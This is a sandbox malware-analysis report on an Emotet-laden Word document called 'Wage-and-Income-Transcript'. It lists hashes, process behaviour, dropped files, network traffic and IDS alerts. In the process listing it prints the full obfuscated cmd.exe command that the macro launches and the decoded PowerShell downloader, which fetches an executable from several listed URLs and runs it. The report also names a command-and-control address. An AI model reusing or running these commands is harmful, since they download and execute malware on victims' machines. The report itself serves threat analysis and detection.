analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
download:

Wage-and-Income-Transcript

Full analysis: https://app.any.run/tasks/98ee35bb-74e1-445b-b3bb-e182caf13e78
Verdict: Malicious activity
Threats:

Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns.

Analysis date: December 06, 2018, 15:47:33
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
trojan
loader
emotet
feodo
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Thu Dec 6 13:30:00 2018, Last Saved Time/Date: Thu Dec 6 13:30:00 2018, Number of Pages: 1, Number of Words: 2, Number of Characters: 13, Security: 0
MD5:

8777EB56F2A1004A4E8E4FA506963757

SHA1:

E233E9273AE1C45B5E82651B8833B03FA0B31C72

SHA256:

146E7F6D83612AA741005BC1CDC285F699FC4580F583D767980D67FEDF788507

SSDEEP:

1536:N81ooMDS034nC54nZrL4AkiuAMOkEEW/yEbzvadf+a96nDfPsPwSvURabL:N8GhDS0o9zTGOZD6EbzCdgDfPsIaH

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3468)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2972)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3468)
    • Application was dropped or rewritten from another process

      • 235.exe (PID: 4052)
      • 235.exe (PID: 2896)
      • archivesymbol.exe (PID: 3160)
      • archivesymbol.exe (PID: 2512)
    • Request from PowerShell which ran from CMD.EXE

      • powershell.exe (PID: 2880)
    • Downloads executable files from the Internet

      • powershell.exe (PID: 2880)
    • Changes the autorun value in the registry

      • archivesymbol.exe (PID: 3160)
    • Connects to CnC server

      • archivesymbol.exe (PID: 3160)
    • EMOTET was detected

      • archivesymbol.exe (PID: 3160)
  • SUSPICIOUS

    • Creates files in the user directory

      • powershell.exe (PID: 2880)
    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 2396)
    • Executable content was dropped or overwritten

      • 235.exe (PID: 2896)
      • powershell.exe (PID: 2880)
    • Application launched itself

      • 235.exe (PID: 4052)
    • Starts itself from another location

      • 235.exe (PID: 2896)
    • Connects to unusual port

      • archivesymbol.exe (PID: 3160)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3468)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3468)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

CompObjUserType: Microsoft Word 97-2003 Document
CompObjUserTypeLen: 32
HeadingPairs:
  • Title
  • 1
TitleOfParts: -
HyperlinksChanged: No
SharedDoc: No
LinksUpToDate: No
ScaleCrop: No
AppVersion: 16
CharCountWithSpaces: 14
Paragraphs: 1
Lines: 1
Company: -
CodePage: Windows Latin 1 (Western European)
Security: None
Characters: 13
Words: 2
Pages: 1
ModifyDate: 2018:12:06 13:30:00
CreateDate: 2018:12:06 13:30:00
TotalEditTime: -
Software: Microsoft Office Word
RevisionNumber: 1
LastModifiedBy: -
Template: Normal.dotm
Comments: -
Keywords: -
Author: -
Subject: -
Title: -
No data.
screenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
8
Malicious processes
8
Suspicious processes
0

Behavior graph

Click at the process to see the details
start drop and start drop and start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe 235.exe no specs 235.exe archivesymbol.exe no specs #EMOTET archivesymbol.exe

Process information

PID
CMD
Path
Indicators
Parent process
3468"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\Wage-and-Income-Transcript.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
2396c:\tUncDEpsQNmuGG\ristSbTd\vlnUPFqZAphRN\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:O/C"set 9HMF=qPwfvuhPEpGpIRJRO0)W4B-YH$gN2/yanc{}13.Lb',D7T +sdkQiUjx@(\C:=;r8FzmlMeVt9oS5A&&for %u in (25,74,27,6,61,41,50,15,71,41,62,25,0,66,52,61,32,70,2,22,74,40,54,70,33,72,46,27,70,72,38,19,70,40,59,68,52,70,32,72,62,25,45,4,71,61,41,6,72,72,11,60,29,29,31,48,11,52,63,52,32,26,3,52,68,67,48,38,33,74,67,29,68,14,33,44,51,11,55,56,6,72,72,11,60,29,29,50,70,68,4,52,32,32,52,50,50,70,68,38,33,74,67,29,24,26,15,56,6,72,72,11,60,29,29,49,31,30,74,3,49,52,48,33,74,32,32,70,33,72,38,33,74,67,29,16,76,39,70,20,56,6,72,72,11,60,29,29,54,74,30,32,72,38,32,70,72,29,7,71,7,73,7,32,56,6,72,72,11,60,29,29,33,63,31,3,72,2,2,38,11,68,29,29,12,36,43,40,36,28,54,59,41,38,75,11,68,52,72,57,41,56,41,18,62,25,69,2,24,61,41,19,53,48,41,62,25,23,5,50,46,61,46,41,28,37,76,41,62,25,3,2,24,61,41,2,69,51,41,62,25,66,77,8,61,25,70,32,4,60,72,70,67,11,47,41,58,41,47,25,23,5,50,47,41,38,70,55,70,41,62,3,74,63,70,31,33,6,57,25,53,51,65,46,52,32,46,25,45,4,71,18,34,72,63,30,34,25,0,66,52,38,43,74,2,32,68,74,31,49,65,52,68,70,57,25,53,51,65,42,46,25,66,77,8,18,62,25,7,2,15,61,41,72,51,21,41,62,12,3,46,57,57,10,70,72,22,12,72,70,67,46,25,66,77,8,18,38,68,70,32,26,72,6,46,22,26,70,46,64,17,17,17,17,18,46,34,12,32,4,74,50,70,22,12,72,70,67,46,25,66,77,8,62,25,75,49,49,61,41,33,50,59,41,62,40,63,70,31,50,62,35,35,33,31,72,33,6,34,35,35,25,71,72,19,61,41,12,24,3,41,62,84)do set edF8=!edF8!!9HMF:~%u,1!&&if %u gtr 83 powershell.exe "!edF8:~6!"" c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2972CmD /V:O/C"set 9HMF=qPwfvuhPEpGpIRJRO0)W4B-YH$gN2/yanc{}13.Lb',D7T +sdkQiUjx@(\C:=;r8FzmlMeVt9oS5A&&for %u in (25,74,27,6,61,41,50,15,71,41,62,25,0,66,52,61,32,70,2,22,74,40,54,70,33,72,46,27,70,72,38,19,70,40,59,68,52,70,32,72,62,25,45,4,71,61,41,6,72,72,11,60,29,29,31,48,11,52,63,52,32,26,3,52,68,67,48,38,33,74,67,29,68,14,33,44,51,11,55,56,6,72,72,11,60,29,29,50,70,68,4,52,32,32,52,50,50,70,68,38,33,74,67,29,24,26,15,56,6,72,72,11,60,29,29,49,31,30,74,3,49,52,48,33,74,32,32,70,33,72,38,33,74,67,29,16,76,39,70,20,56,6,72,72,11,60,29,29,54,74,30,32,72,38,32,70,72,29,7,71,7,73,7,32,56,6,72,72,11,60,29,29,33,63,31,3,72,2,2,38,11,68,29,29,12,36,43,40,36,28,54,59,41,38,75,11,68,52,72,57,41,56,41,18,62,25,69,2,24,61,41,19,53,48,41,62,25,23,5,50,46,61,46,41,28,37,76,41,62,25,3,2,24,61,41,2,69,51,41,62,25,66,77,8,61,25,70,32,4,60,72,70,67,11,47,41,58,41,47,25,23,5,50,47,41,38,70,55,70,41,62,3,74,63,70,31,33,6,57,25,53,51,65,46,52,32,46,25,45,4,71,18,34,72,63,30,34,25,0,66,52,38,43,74,2,32,68,74,31,49,65,52,68,70,57,25,53,51,65,42,46,25,66,77,8,18,62,25,7,2,15,61,41,72,51,21,41,62,12,3,46,57,57,10,70,72,22,12,72,70,67,46,25,66,77,8,18,38,68,70,32,26,72,6,46,22,26,70,46,64,17,17,17,17,18,46,34,12,32,4,74,50,70,22,12,72,70,67,46,25,66,77,8,62,25,75,49,49,61,41,33,50,59,41,62,40,63,70,31,50,62,35,35,33,31,72,33,6,34,35,35,25,71,72,19,61,41,12,24,3,41,62,84)do set edF8=!edF8!!9HMF:~%u,1!&&if %u gtr 83 powershell.exe "!edF8:~6!""C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2880powershell.exe "$oNh='kRV';$qzi=new-object Net.WebClient;$TvV='http://aspiringfilms.com/lJc7Qpx@http://kelvinnikkel.com/HgR@http://dayofdisconnect.com/O5Le4@http://joynt.net/PVP9Pn@http://craftww.pl//I1Db12jC'.Split('@');$MwH='WUs';$Yuk = '235';$fwH='wMQ';$zAE=$env:temp+'\'+$Yuk+'.exe';foreach($UQF in $TvV){try{$qzi.DownloadFile($UQF, $zAE);$PwR='tQB';If ((Get-Item $zAE).length -ge 80000) {Invoke-Item $zAE;$Sdd='ckC';break;}}catch{}}$VtW='IHf';"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
4052"C:\Users\admin\AppData\Local\Temp\235.exe" C:\Users\admin\AppData\Local\Temp\235.exepowershell.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Exit code:
0
Version:
6.1.7600.1
2896"C:\Users\admin\AppData\Local\Temp\235.exe"C:\Users\admin\AppData\Local\Temp\235.exe
235.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Exit code:
0
Version:
6.1.7600.1
2512"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe235.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Exit code:
0
Version:
6.1.7600.1
3160"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe"C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe
archivesymbol.exe
User:
admin
Company:
Nexon Corp.
Integrity Level:
MEDIUM
Description:
Softpub Specialer DLL
Version:
6.1.7600.1
Total events
1 670
Read events
1 256
Write events
0
Delete events
0

Modification events

No data
Executable files
2
Suspicious files
2
Text files
0
Unknown types
2

Dropped files

PID
Process
Filename
Type
3468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA6B3.tmp.cvr
MD5:
SHA256:
2880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\YOE4MBZ2XDXBJF4J7MT8.temp
MD5:
SHA256:
2880powershell.exeC:\Users\admin\AppData\Local\Temp\235.exeexecutable
MD5:3ACF392AA90549B4DBFCC6DAA3CC93C6
SHA256:8EB617859F7916BDB263CA8B603595D17894FF2D19BBD460FE57B11D5AB48C46
2896235.exeC:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exeexecutable
MD5:3ACF392AA90549B4DBFCC6DAA3CC93C6
SHA256:8EB617859F7916BDB263CA8B603595D17894FF2D19BBD460FE57B11D5AB48C46
2880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3468WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:C9005899C42F58E9E7C96DCB3A5EE8E3
SHA256:BAAA4B86601B2CDBDAF8C9D3F3076A6A57EBB0E5FFD49CF53E039A90105750E4
2880powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF13b365.TMPbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
3468WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$ge-and-Income-Transcript.docpgc
MD5:A95681784AAE4DD478B537C01204A310
SHA256:30F39BE5BB957465B0F552AE6AAEBC36232AC033A737D89326447F4EA9F7FFA0
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
3
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
2880
powershell.exe
GET
200
67.225.182.246:80
http://aspiringfilms.com/lJc7Qpx/
US
executable
120 Kb
malicious
2880
powershell.exe
GET
301
67.225.182.246:80
http://aspiringfilms.com/lJc7Qpx
US
html
241 b
malicious
3160
archivesymbol.exe
GET
200
189.223.176.239:7080
http://189.223.176.239:7080/
MX
binary
132 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3160
archivesymbol.exe
189.223.176.239:7080
Uninet S.A. de C.V.
MX
malicious
2880
powershell.exe
67.225.182.246:80
aspiringfilms.com
Liquid Web, L.L.C
US
malicious

DNS requests

Domain
IP
Reputation
aspiringfilms.com
  • 67.225.182.246
malicious

Threats

PID
Process
Class
Message
2880
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
2880
powershell.exe
Potential Corporate Privacy Violation
ET POLICY PE EXE or DLL Windows file download HTTP
2880
powershell.exe
Potentially Bad Traffic
ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download
2880
powershell.exe
Misc activity
ET INFO EXE - Served Attached HTTP
3160
archivesymbol.exe
A Network Trojan was detected
SC SPYWARE Spyware Emotet Win32
3160
archivesymbol.exe
A Network Trojan was detected
MALWARE [PTsecurity] Feodo HTTP request
1 ETPRO signatures available at the full report
No debug info